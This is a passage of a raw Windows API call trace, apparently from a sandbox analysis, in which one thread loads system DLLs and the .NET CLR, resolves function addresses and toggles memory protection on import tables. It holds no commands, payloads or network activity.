CreateFileMappingW (hFile=0x270, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x26c [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] ResetEvent (hEvent=0x200) returned 1 [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] ResetEvent (hEvent=0x200) returned 1 [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] SetEvent (hEvent=0x20c) returned 1 [0053.664] SetEvent (hEvent=0x200) returned 1 [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] SetEvent (hEvent=0x20c) returned 1 [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] ResetEvent (hEvent=0x200) returned 1 [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] ResetEvent (hEvent=0x200) returned 1 [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] GetCurrentThreadId () returned 0x13dc [0053.664] SetEvent (hEvent=0x20c) returned 1 [0053.664] SetEvent (hEvent=0x200) returned 1 [0053.664] CloseHandle (hObject=0x270) returned 1 [0053.665] GetCurrentThreadId () returned 0x13dc [0053.665] ResetEvent (hEvent=0x200) returned 1 [0053.665] GetCurrentThreadId () returned 0x13dc [0053.665] GetCurrentThreadId () returned 0x13dc [0053.665] GetCurrentThreadId () returned 0x13dc [0053.665] GetCurrentThreadId () returned 0x13dc [0053.665] ResetEvent (hEvent=0x200) returned 1 [0053.665] GetCurrentThreadId () returned 0x13dc [0053.665] GetCurrentThreadId () returned 0x13dc [0053.665] SetEvent (hEvent=0x20c) returned 1 [0053.665] SetEvent (hEvent=0x200) returned 1 [0053.665] CloseHandle (hObject=0x26c) returned 1 [0053.666] SysReAllocStringLen (in: pbstr=0x13ff25c*=0x0, psz="api-ms-win-appmodel-runtime-l1-1-2.dll", len=0x26 | out: pbstr=0x13ff25c*="api-ms-win-appmodel-runtime-l1-1-2.dll") returned 1 [0053.666] CharLowerBuffW (in: lpsz="api-ms-win-appmodel-runtime-l1-1-2.dll", cchLength=0x26 | out: lpsz="api-ms-win-appmodel-runtime-l1-1-2.dll") returned 0x26 [0053.667] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2.dll", hFile=0x0, dwFlags=0x800) returned 0x773a0000 [0053.667] GetLastError () returned 0x0 [0053.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0053.667] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0053.667] GetModuleFileNameA (in: hModule=0x773a0000, lpFilename=0x13ff140, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")) returned 0x26 [0053.667] GetCurrentProcess () returned 0xffffffff [0053.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff244*=0x773a837c, NumberOfBytesToProtect=0x13ff248, NewAccessProtection=0x4, OldAccessProtection=0x13ff27c | out: BaseAddress=0x13ff244*=0x773a8000, NumberOfBytesToProtect=0x13ff248, OldAccessProtection=0x13ff27c*=0x2) returned 0x0 [0053.667] GetCurrentProcess () returned 0xffffffff [0053.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff244*=0x773a837c, NumberOfBytesToProtect=0x13ff248, NewAccessProtection=0x2, OldAccessProtection=0x13ff27c | out: BaseAddress=0x13ff244*=0x773a8000, NumberOfBytesToProtect=0x13ff248, OldAccessProtection=0x13ff27c*=0x4) returned 0x0 [0053.668] GetCurrentProcess () returned 0xffffffff [0053.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff244*=0x773a838c, NumberOfBytesToProtect=0x13ff248, NewAccessProtection=0x4, OldAccessProtection=0x13ff27c | out: BaseAddress=0x13ff244*=0x773a8000, NumberOfBytesToProtect=0x13ff248, OldAccessProtection=0x13ff27c*=0x2) returned 0x0 [0053.668] GetCurrentProcess () returned 0xffffffff [0053.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff244*=0x773a838c, NumberOfBytesToProtect=0x13ff248, NewAccessProtection=0x2, OldAccessProtection=0x13ff27c | out: BaseAddress=0x13ff244*=0x773a8000, NumberOfBytesToProtect=0x13ff248, OldAccessProtection=0x13ff27c*=0x4) returned 0x0 [0053.668] SetLastError (dwErrCode=0x0) [0053.668] GetProcAddress (hModule=0x773a0000, lpProcName="AppPolicyGetClrCompat") returned 0x773a31b0 [0053.668] GetProcAddress (hModule=0x773a0000, lpProcName="GetCurrentPackageId") returned 0x773a3510 [0053.668] GetProcAddress (hModule=0x773a0000, lpProcName="GetCurrentPackageInfo") returned 0x773a3520 [0053.669] GetProcAddress (hModule=0x773a0000, lpProcName="GetCurrentPackagePath") returned 0x773a3530 [0053.669] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0053.669] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756fee90 [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] ResetEvent (hEvent=0x200) returned 1 [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] ResetEvent (hEvent=0x200) returned 1 [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] SetEvent (hEvent=0x20c) returned 1 [0053.670] SetEvent (hEvent=0x200) returned 1 [0053.670] CloseHandle (hObject=0x270) returned 1 [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] ResetEvent (hEvent=0x200) returned 1 [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] ResetEvent (hEvent=0x200) returned 1 [0053.670] GetCurrentThreadId () returned 0x13dc [0053.670] GetCurrentThreadId () returned 0x13dc [0053.671] SetEvent (hEvent=0x20c) returned 1 [0053.671] SetEvent (hEvent=0x200) returned 1 [0053.671] CloseHandle (hObject=0x26c) returned 1 [0053.673] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe7c144, cbMultiByte=11, lpWideCharStr=0x13fe040, cchWideChar=2047 | out: lpWideCharStr="VERSION.dll") returned 11 [0053.673] SysReAllocStringLen (in: pbstr=0x13ff044*=0x0, psz="VERSION.dll", len=0xb | out: pbstr=0x13ff044*="VERSION.dll") returned 1 [0053.673] CharLowerBuffW (in: lpsz="VERSION.dll", cchLength=0xb | out: lpsz="version.dll") returned 0xb [0053.673] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x742d0000 [0053.674] GetLastError () returned 0x0 [0053.674] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0053.674] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0053.674] GetModuleFileNameA (in: hModule=0x742d0000, lpFilename=0x13fef2c, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0053.674] GetCurrentProcess () returned 0xffffffff [0053.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff030*=0x742d50ac, NumberOfBytesToProtect=0x13ff034, NewAccessProtection=0x4, OldAccessProtection=0x13ff068 | out: BaseAddress=0x13ff030*=0x742d5000, NumberOfBytesToProtect=0x13ff034, OldAccessProtection=0x13ff068*=0x2) returned 0x0 [0053.674] GetCurrentProcess () returned 0xffffffff [0053.674] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff030*=0x742d50ac, NumberOfBytesToProtect=0x13ff034, NewAccessProtection=0x2, OldAccessProtection=0x13ff068 | out: BaseAddress=0x13ff030*=0x742d5000, NumberOfBytesToProtect=0x13ff034, OldAccessProtection=0x13ff068*=0x4) returned 0x0 [0053.674] GetCurrentProcess () returned 0xffffffff [0053.675] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff030*=0x742d50c4, NumberOfBytesToProtect=0x13ff034, NewAccessProtection=0x4, OldAccessProtection=0x13ff068 | out: BaseAddress=0x13ff030*=0x742d5000, NumberOfBytesToProtect=0x13ff034, OldAccessProtection=0x13ff068*=0x2) returned 0x0 [0053.675] GetCurrentProcess () returned 0xffffffff [0053.675] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff030*=0x742d50c4, NumberOfBytesToProtect=0x13ff034, NewAccessProtection=0x2, OldAccessProtection=0x13ff068 | out: BaseAddress=0x13ff030*=0x742d5000, NumberOfBytesToProtect=0x13ff034, OldAccessProtection=0x13ff068*=0x4) returned 0x0 [0053.675] SetLastError (dwErrCode=0x0) [0053.675] GetProcAddress (hModule=0x742d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x742d1570 [0055.028] GetProcAddress (hModule=0x742d0000, lpProcName="GetFileVersionInfoW") returned 0x742d1590 [0055.040] GetProcAddress (hModule=0x742d0000, lpProcName="VerQueryValueW") returned 0x742d1510 [0055.281] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x268 [0055.282] GetLastError () returned 0x0 [0055.282] SysReAllocStringLen (in: pbstr=0x13ff764*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x13ff764*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0055.282] GetThreadLocale () returned 0x409 [0055.282] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0055.282] GetThreadLocale () returned 0x409 [0055.282] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0055.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", nBufferLength=0x104, lpBuffer=0x13ff4e8, lpFilePart=0x13ff4e4 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpFilePart=0x13ff4e4*="clr.dll") returned 0x35 [0055.282] SysReAllocStringLen (in: pbstr=0x13ff764*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x13ff764*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0055.282] SysReAllocStringLen (in: pbstr=0x13ff714*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x13ff714*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0055.282] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 0x35 [0055.282] SysReAllocStringLen (in: pbstr=0x13ff764*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x13ff764*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 1 [0055.282] SetLastError (dwErrCode=0x0) [0055.282] GetCurrentThreadId () returned 0x13dc [0055.282] ResetEvent (hEvent=0x200) returned 1 [0055.282] GetCurrentThreadId () returned 0x13dc [0055.282] GetCurrentThreadId () returned 0x13dc [0055.282] GetCurrentThreadId () returned 0x13dc [0055.282] GetCurrentThreadId () returned 0x13dc [0055.282] ResetEvent (hEvent=0x200) returned 1 [0055.282] GetCurrentThreadId () returned 0x13dc [0055.282] GetCurrentThreadId () returned 0x13dc [0055.282] SetEvent (hEvent=0x20c) returned 1 [0055.282] SetEvent (hEvent=0x200) returned 1 [0055.282] CloseHandle (hObject=0x268) returned 1 [0055.285] SysReAllocStringLen (in: pbstr=0x13ffab4*=0x0, psz="clr.dll", len=0x7 | out: pbstr=0x13ffab4*="clr.dll") returned 1 [0055.285] CharLowerBuffW (in: lpsz="clr.dll", cchLength=0x7 | out: lpsz="clr.dll") returned 0x7 [0055.285] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", hFile=0x0, dwFlags=0x8) returned 0x73a60000 [0056.601] SysReAllocStringLen (in: pbstr=0x13ff684*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13ff684*="kernel32.dll") returned 1 [0056.601] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0056.601] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0056.604] GetProcAddress (hModule=0x772d0000, lpProcName="FlsAlloc") returned 0x772e4ae0 [0056.606] GetProcAddress (hModule=0x772d0000, lpProcName="FlsFree") returned 0x772e4b00 [0056.609] GetProcAddress (hModule=0x772d0000, lpProcName="FlsGetValue") returned 0x772e4b20 [0056.611] GetProcAddress (hModule=0x772d0000, lpProcName="FlsSetValue") returned 0x772e4b40 [0056.613] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7733ebc0 [0056.613] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventExW") returned 0x7733eb20 [0056.613] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSemaphoreExW") returned 0x7733eb80 [0056.613] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadStackGuarantee") returned 0x772e6700 [0056.613] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolTimer") returned 0x772e6d30 [0056.613] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolTimer") returned 0x779bd7c0 [0056.614] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bb840 [0056.616] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolTimer") returned 0x779bb740 [0056.618] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolWait") returned 0x772e6d70 [0056.620] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolWait") returned 0x779bc0b0 [0056.622] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolWait") returned 0x779bbe10 [0056.624] GetProcAddress (hModule=0x772d0000, lpProcName="FlushProcessWriteBuffers") returned 0x779e2b20 [0056.624] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779d8e50 [0056.624] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessorNumber") returned 0x779d52f0 [0056.624] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalProcessorInformation") returned 0x772e71b0 [0056.625] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSymbolicLinkW") returned 0x772e4510 [0056.625] GetProcAddress (hModule=0x772d0000, lpProcName="SetDefaultDllDirectories") returned 0x74d2d900 [0056.625] GetProcAddress (hModule=0x772d0000, lpProcName="EnumSystemLocalesEx") returned 0x772e49a0 [0056.627] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringEx") returned 0x772e7050 [0056.629] GetProcAddress (hModule=0x772d0000, lpProcName="GetDateFormatEx") returned 0x772e7760 [0056.631] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocaleInfoEx") returned 0x772e7190 [0056.634] GetProcAddress (hModule=0x772d0000, lpProcName="GetTimeFormatEx") returned 0x772e7780 [0056.635] GetProcAddress (hModule=0x772d0000, lpProcName="GetUserDefaultLocaleName") returned 0x772e72c0 [0056.635] GetProcAddress (hModule=0x772d0000, lpProcName="IsValidLocaleName") returned 0x772e7440 [0056.636] GetProcAddress (hModule=0x772d0000, lpProcName="LCMapStringEx") returned 0x772e7480 [0056.636] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentPackageId") returned 0x74cbe260 [0056.636] GetProcAddress (hModule=0x772d0000, lpProcName="GetTickCount64") returned 0x772e0db0 [0056.636] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0056.636] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0056.689] SysReAllocStringLen (in: pbstr=0x13ff630*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13ff630*="kernel32.dll") returned 1 [0056.689] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0056.689] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0056.691] GetProcAddress (hModule=0x772d0000, lpProcName="GetEnabledXStateFeatures") returned 0x772e8240 [0056.712] GetProcAddress (hModule=0x74bc0000, lpProcName="EventSetInformation") returned 0x779c2340 [0056.713] FreeLibrary (hLibModule=0x74bc0000) returned 1 [0056.728] GetLastError () returned 0x0 [0056.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0056.728] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0056.728] GetModuleFileNameA (in: hModule=0x73a60000, lpFilename=0x13ff998, nSize=0x105 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0056.728] GetCurrentProcess () returned 0xffffffff [0056.729] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef018, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.729] GetCurrentProcess () returned 0xffffffff [0056.729] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef018, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.729] GetCurrentProcess () returned 0xffffffff [0056.729] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef030, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.729] GetCurrentProcess () returned 0xffffffff [0056.729] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef030, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.729] GetCurrentProcess () returned 0xffffffff [0056.729] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef0d8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.729] GetCurrentProcess () returned 0xffffffff [0056.730] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef0d8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.730] GetCurrentProcess () returned 0xffffffff [0056.730] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef0e4, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.730] GetCurrentProcess () returned 0xffffffff [0056.730] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef0e4, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.730] GetCurrentProcess () returned 0xffffffff [0056.730] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef0e8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.730] GetCurrentProcess () returned 0xffffffff [0056.730] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef0e8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.731] GetCurrentProcess () returned 0xffffffff [0056.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef114, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.731] GetCurrentProcess () returned 0xffffffff [0056.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef114, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.731] GetCurrentProcess () returned 0xffffffff [0056.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef12c, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.731] GetCurrentProcess () returned 0xffffffff [0056.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef12c, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.731] GetCurrentProcess () returned 0xffffffff [0056.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef1bc, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.732] GetCurrentProcess () returned 0xffffffff [0056.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef1bc, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.732] GetCurrentProcess () returned 0xffffffff [0056.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef1d0, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.732] GetCurrentProcess () returned 0xffffffff [0056.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef1d0, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.732] GetCurrentProcess () returned 0xffffffff [0056.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef1d4, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.732] GetCurrentProcess () returned 0xffffffff [0056.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef1d4, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.733] GetCurrentProcess () returned 0xffffffff [0056.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef1d8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.733] GetCurrentProcess () returned 0xffffffff [0056.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef1d8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.733] GetCurrentProcess () returned 0xffffffff [0056.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef200, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.733] GetCurrentProcess () returned 0xffffffff [0056.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef200, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.733] GetCurrentProcess () returned 0xffffffff [0056.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef208, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) 